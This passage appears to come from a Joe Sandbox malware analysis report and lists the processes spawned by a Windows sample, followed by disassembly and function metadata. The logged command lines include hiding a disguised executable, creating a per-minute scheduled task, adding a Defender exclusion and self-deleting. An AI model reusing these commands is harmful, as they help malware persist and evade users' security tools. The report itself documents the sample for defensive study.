MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:14:07
Start date:	20/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5208 -s 784
Imagebase:	0x7ff6eac00000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:14:09
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:14:10
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	17:14:11
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x310000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff6b72e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff60c660000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6b72e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6b72e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7934f0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Imagebase:	0x7ff65e1f0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.0.0.1; del in.exe
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	17:14:13
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	17:14:15
Start date:	20/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.0.0.1
Imagebase:	0x7ff653660000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	17:14:16
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6e03a0000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	17:14:16
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc60000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	17:14:16
Start date:	20/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xcf0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	17:14:17
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	17:14:17
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	17:14:21
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"
Imagebase:	0xad0000
File size:	1'863'680 bytes
MD5 hash:	27C1F96D7E1B72B6817B6EFEFF037F90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.7%
Total number of Nodes:	765
Total number of Limit Nodes:	16

Executed Functions

Function 00EA652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00EA652A,?,?,?,?,?,00EA7661), ref: 00EA6566

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 0b57f36954b55a22c8ba99cd834f398cd827c169ea8d9d0a0baedbb2edf63f1b
Instruction ID: 0eaaeb7660d7a30ec77274fef0ca43925c55575fbe75b81ccb229277f1f51821
Opcode Fuzzy Hash: 0b57f36954b55a22c8ba99cd834f398cd827c169ea8d9d0a0baedbb2edf63f1b
Instruction Fuzzy Hash: CAE08C30441208AECE357B18CC09E8D3B6AEB07758F086814FD086E221CB35FD86CA80

Function 056F0D84 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef15cb8d789cfb7e0be9527c841fe2e373c7af1d2fc42a1b7992d5ba26d96eb
Instruction ID: bfe83088306e67c90e50c0430317309c408e4e88bbadb62bd4de7eef806a5536
Opcode Fuzzy Hash: 6ef15cb8d789cfb7e0be9527c841fe2e373c7af1d2fc42a1b7992d5ba26d96eb
Instruction Fuzzy Hash: 1C01A2BFA0D211BD6152D1853B58AF6A7ABE6DB330330C427F607C6603D2844A5BE332

Function 00E75C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00E760FA
0000043f, xrefs: 00E7612B
00000422, xrefs: 00E760C9
00000419, xrefs: 00E76098
Keyboard Layout\Preload, xrefs: 00E76054

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 84a5472fc8d04eb7b01219ed97f5cafddea48d71849e7e3870efe798ec738c5c
Instruction ID: 8cef42021445d0000f43bd0a8b5543180c658430198dacc6a2640faa1f27f498
Opcode Fuzzy Hash: 84a5472fc8d04eb7b01219ed97f5cafddea48d71849e7e3870efe798ec738c5c
Instruction Fuzzy Hash: A0F1E171A0024C9BEB24DF54CD84BDEBBB9EB45304F5086A9F50CB72C1DBB49A84CB94

Function 00E79BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e70000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 3df7c072a7fdf4fe11b2d60c7c301bf0f4a6d6ef0b3cb9ce4fe49ccbcd1627ca
Instruction ID: bac51a0a1ec54e787b12a52b75fe3b34cd67cf89a8e77a6595bad29e8d2085c9
Opcode Fuzzy Hash: 3df7c072a7fdf4fe11b2d60c7c301bf0f4a6d6ef0b3cb9ce4fe49ccbcd1627ca
Instruction Fuzzy Hash: 413127717042048BEB08EB78ED8976DB7A2EFC5320F249629E01CB72D6D77589848756

Function 00E79F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E7A963
CreateMutexA.KERNEL32(00000000,00000000,00ED3254), ref: 00E7A981

Strings

T2, xrefs: 00E7A970

Memory Dump Source

Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
